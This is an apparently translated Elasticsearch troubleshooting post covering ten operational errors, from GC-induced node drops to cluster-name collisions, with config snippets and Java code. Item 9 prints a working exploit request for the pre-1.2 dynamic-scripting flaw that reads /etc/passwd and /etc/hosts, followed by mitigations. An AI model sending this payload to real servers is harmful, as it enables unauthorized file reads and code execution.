1. Node detachment caused by GC
Because GC pauses stop the JVM, a node whose GC takes too long will fail the master's pings (Zen Discovery retries the ping 3 times by default) and be removed from the cluster, causing its shards to be reallocated.
Workaround:
(1) Tune GC to reduce pause times.
(2) Increase Zen Discovery's retry count (ES setting: ping_retries) and timeout (ES setting: ping_timeout).
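Workaround (2) might look like this in elasticsearch.yml (setting names follow the Zen Discovery fault-detection namespace of 1.x-era ES; the values are illustrative, not recommendations):

```yaml
# elasticsearch.yml -- tolerate longer GC pauses before dropping a node
discovery.zen.fd.ping_timeout: 60s   # default 30s
discovery.zen.fd.ping_retries: 6     # default 3
```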
It turned out that the root cause was that one node's hard drive was full, which degraded system performance.
2. Out of memory error
By default ES places no limit on the size of the field data cache. Queries load field values into memory, and facet queries in particular are memory-hungry: results are held in memory for sorting and similar operations. Memory keeps being consumed until it runs out, at which point an out of memory error occurs.
Workaround:
(1) Set the ES cache type to soft reference. Soft-referenced objects are reclaimed only when memory is insufficient, so they normally survive while memory is plentiful, and Java guarantees they are cleared before an OutOfMemory exception is thrown. This is commonly used for caches (for example image caches): memory is used as fully as possible without causing an OOM. Add Index.cache.field.type: soft to the ES configuration file.
(2) Set a maximum entry count and an expiration time for the ES field cache: index.cache.field.max_size: 50000 caps the cache at 50000 field values, and index.cache.field.expire: 10m expires entries after 10 minutes.
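Putting workarounds (1) and (2) together, the elasticsearch.yml entries described in the text would be:

```yaml
# elasticsearch.yml
index.cache.field.type: soft      # soft-reference cache, cleared under memory pressure
index.cache.field.max_size: 50000 # cap the number of cached field values
index.cache.field.expire: 10m     # evict entries after 10 minutes
```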
3. Unable to create new native thread
ES reports an error during recovery: RecoverFilesRecoveryException[[index][3] Failed to transfer [215] files with total size of [9.4GB]]; nested: OutOfMemoryError[unable to create new native thread]
At first this looked like a file handle limit, but that produces a "too many open files" error, as seen in earlier reports, and enlarging the data reproduced the problem anyway. Investigation showed that the maximum number of threads a JVM process can create is roughly virtual memory / (stack size * 1024 * 1024): the more virtual memory, or the smaller the stack, the more threads can be created. Yet after adjusting those values the error still appeared, even though the computed thread count was more than enough, so some other system limit had to be involved. It turned out to be the max user processes limit, which defaults to 1024. Despite the name, the official note says this is the maximum number of threads a user can create; since every process has at least one thread, it indirectly caps the number of processes as well. Increasing this parameter made the error go away.
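The thread-count estimate described above can be sketched as a quick calculation (an approximation only; real limits also depend on max user processes, heap size, and native overhead):

```java
// Rough sketch of the formula mentioned above (an approximation, not an
// exact kernel guarantee): max threads ~= virtual memory / thread stack size.
public class MaxThreadEstimate {
    // virtualMemoryMb: process virtual memory limit in MB
    // stackSizeKb: per-thread stack size in KB (the JVM -Xss value)
    static long estimateMaxThreads(long virtualMemoryMb, long stackSizeKb) {
        return (virtualMemoryMb * 1024) / stackSizeKb;
    }

    public static void main(String[] args) {
        // e.g. 4 GB of virtual memory with a 512 KB stack:
        System.out.println(estimateMaxThreads(4096, 512)); // 8192
    }
}
```

Halving the stack size doubles the estimate, which is why workaround (1) below mentions reducing -Xss.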
Workaround:
(1) Increase the JVM's heap memory or reduce the -Xss stack size (the default here was 512K).
(2) Open /etc/security/limits.conf and raise the 1024 in the "soft nproc 1024" line.
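In limits.conf form, workaround (2) could look like this (the user name and value are illustrative):

```
# /etc/security/limits.conf -- raise the per-user process/thread limit
# for the user that runs elasticsearch
elasticsearch soft nproc 10240
elasticsearch hard nproc 10240
```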
4. Concurrent insert errors when cluster status is yellow
[7]: index [index], type [index], id [1569133], message [UnavailableShardsException[[index][1] [4] shardIt, [2] active : Timeout waiting for [1m], request: org.elasticsearch.action.bulk.BulkShardRequest@5989fa07]]
This error appears when the cluster status is yellow, i.e. replicas are unassigned. Here the replica count was set to 2 with only one node. When the replica count exceeds the number of available machines, inserts are likely to fail like this because ES's default write consistency is quorum: the number of active shard copies must reach int(copies / 2) + 1. With 2 replicas the quorum is 2, so at least two copies must be written; but with a single node only the primary is active, so the write reaches the primary alone, waits for a replica that can never be assigned, and reports the error above.
Workaround:
(1) Remove the unassigned replicas (reduce the replica count).
(2) Change the write consistency to one, so writing the primary alone is enough.
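The quorum arithmetic above can be checked directly (this reproduces the documented formula int((1 primary + replicas) / 2) + 1, not ES's actual code):

```java
public class WriteQuorum {
    // quorum = int((1 primary + numberOfReplicas) / 2) + 1
    static int quorum(int numberOfReplicas) {
        return (1 + numberOfReplicas) / 2 + 1;
    }

    public static void main(String[] args) {
        // replicas=2 -> quorum=2, but a single node can only activate the
        // primary (1 active copy), so the write times out as in the error above
        System.out.println(quorum(2)); // 2
        // replicas=0 -> quorum=1, so a single node suffices
        System.out.println(quorum(0)); // 1
    }
}
```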
5. Warning when the JVM locks memory
With bootstrap.mlockall: true set, ES warns at startup with "Unknown mlockall error 0", because by default the Linux system only allows the process to lock 45k of memory.
Workaround: remove the limit with the Linux command: ulimit -l unlimited
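To make the change persistent rather than per-session, the equivalent limits.conf entries would be (user name illustrative):

```
# /etc/security/limits.conf -- allow the ES user to lock unlimited memory
elasticsearch soft memlock unlimited
elasticsearch hard memlock unlimited
```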
6. Misusing an API hangs the cluster
This was actually a very basic mistake. The task was to update some data, part of which might need deleting, but a colleague used the deleteByQuery interface, building a BoolQuery that contained the IDs of the data to delete. The problem is that a BoolQuery supports at most 1024 clauses, and even 100 is already a lot, so the query immediately hung the ES cluster.
Workaround: use a BulkRequest to perform bulk deletes.
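Whichever delete API is used, the key move is splitting the ID list into bounded batches. A minimal sketch in plain Java (no ES client involved; the batch size of 1000 is an arbitrary choice kept under the 1024-clause limit):

```java
import java.util.ArrayList;
import java.util.List;

public class IdBatcher {
    // Split a large id list into batches small enough to stay under
    // the 1024-clause bool query limit mentioned above.
    static List<List<String>> batches(List<String> ids, int batchSize) {
        List<List<String>> out = new ArrayList<>();
        for (int i = 0; i < ids.size(); i += batchSize) {
            out.add(new ArrayList<>(
                ids.subList(i, Math.min(i + batchSize, ids.size()))));
        }
        return out;
    }

    public static void main(String[] args) {
        List<String> ids = new ArrayList<>();
        for (int i = 0; i < 2500; i++) ids.add("doc-" + i);
        List<List<String>> b = batches(ids, 1000);
        System.out.println(b.size());        // 3
        System.out.println(b.get(2).size()); // 500
    }
}
```

Each batch can then be fed to one bulk delete request instead of one giant query.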
7. org.elasticsearch.transport.RemoteTransportException: Failed to deserialize exception response from stream
Cause: the ES nodes are running different JDK versions.
Workaround: use the same JDK version on all nodes.
8. org.elasticsearch.client.transport.NoNodeAvailableException: No node available
(1) Wrong port
Client client = new TransportClient().addTransportAddress(new InetSocketTransportAddress(ipAddress, 9300));
Writing 9200 instead of 9300 gives "no node available".
If you are not connecting to the local machine, also check that the IP is correct.
(2) The client jar version does not match the server: ideally the jar version should match whatever version the service runs (not verified here; mine matched).
(3) If you changed the cluster name, set it on the client:
Settings settings = ImmutableSettings.settingsBuilder().put("cluster.name", "xxx").build();
Client client = new TransportClient(settings).addTransportAddress(new InetSocketTransportAddress(ipAddress, 9300));
(4) The cluster does not respond within 5s
Workarounds: 1. Increase client.transport.ping_timeout
2. Retry in the code:

while (true) {
    try {
        bulk.execute().actionGet(getRetryTimeout());
        break;
    } catch (NoNodeAvailableException e) {
        Thread.sleep(5000);
    }
}
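That retry loop can be factored into a small bounded helper (a generic sketch, not ES client code; the exception type, attempt count, and delay are illustrative choices):

```java
import java.util.function.Supplier;

public class Retry {
    // Retry a call until it succeeds or attempts run out, sleeping between
    // failures -- the same pattern as the while(true) loop above, but bounded
    // so a permanently dead cluster cannot spin forever.
    static <T> T withRetries(Supplier<T> call, int maxAttempts, long sleepMs) {
        RuntimeException last = null;
        for (int attempt = 1; attempt <= maxAttempts; attempt++) {
            try {
                return call.get();
            } catch (RuntimeException e) {
                last = e;
                if (attempt < maxAttempts) {
                    try {
                        Thread.sleep(sleepMs);
                    } catch (InterruptedException ie) {
                        Thread.currentThread().interrupt();
                        throw last;
                    }
                }
            }
        }
        throw last;
    }

    public static void main(String[] args) {
        int[] failures = {2}; // fail twice, then succeed
        String result = withRetries(() -> {
            if (failures[0]-- > 0) throw new IllegalStateException("no node available");
            return "ok";
        }, 5, 10);
        System.out.println(result); // ok
    }
}
```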
9. A vulnerability was recently found in Elasticsearch that allows remote execution of arbitrary code. Because Elasticsearch exposes an HTTP interface, CSRF-style attacks are possible, for example via a malicious page viewed in a browser.
Vulnerability Impact Version:
Elasticsearch below 1.2
Test code:
http://esserverip:9200/_search?source=<url-encoded query>&callback=jquery111102863897154977554_1400571156308&_=1400571156309

where the URL-encoded source parameter decodes to a query that uses script_fields to read files from disk:

{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"/etc/hosts":{"script":"import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\Z\").next();"},"/etc/passwd":{"script":"import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\Z\").next();"}}}
The browser returns the contents of /etc/passwd (and /etc/hosts).
Solution:
1. Set script.disable_dynamic: true in the configuration file elasticsearch.yml
2. Strictly restrict which IP addresses can access the Elasticsearch service
Reference:
http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html#_disabling_dynamic_scripts
10. 503 error after reboot
The details are as follows:
[2014-09-23 17:42:33,499][WARN ][transport.netty] [Erik Magnus Lehnsherr] Message not fully read (request) for [4961353] and action [discovery/zen/join/validate], resetting
[2014-09-23 17:42:33,522][INFO ][discovery.zen] [Erik Magnus Lehnsherr] failed to send join request to master [[Red Lotus][UG2WBJPDTHOB-EJZJFRSOW][n025.corp.ncfgroup.com][inet[/10.18.6.25:9300]]], reason [org.elasticsearch.transport.RemoteTransportException: [Red Lotus][inet[/10.18.6.25:9300]][discovery/zen/join]; org.elasticsearch.transport.RemoteTransportException: [Erik Magnus Lehnsherr][inet[/10.18.6.90:9300]][discovery/zen/join/validate]; org.elasticsearch.ElasticsearchIllegalArgumentException: No custom index metadata factory registered for type [rivers]]
Cause: everyone used the default cluster name, so differently configured nodes from different people joined the same cluster and took part in master election, and sometimes IP restrictions then prevented the connection.
Fix: give your own test service a distinctive cluster name.
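For example, in each developer's elasticsearch.yml (the name here is illustrative):

```yaml
# elasticsearch.yml -- avoid accidentally joining someone else's cluster
cluster.name: es-test-yourname   # anything other than the default "elasticsearch"
```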
References: http://blog.csdn.net/laigood/article/details/8193170
From http://blog.csdn.net/july_2/article/details/24728733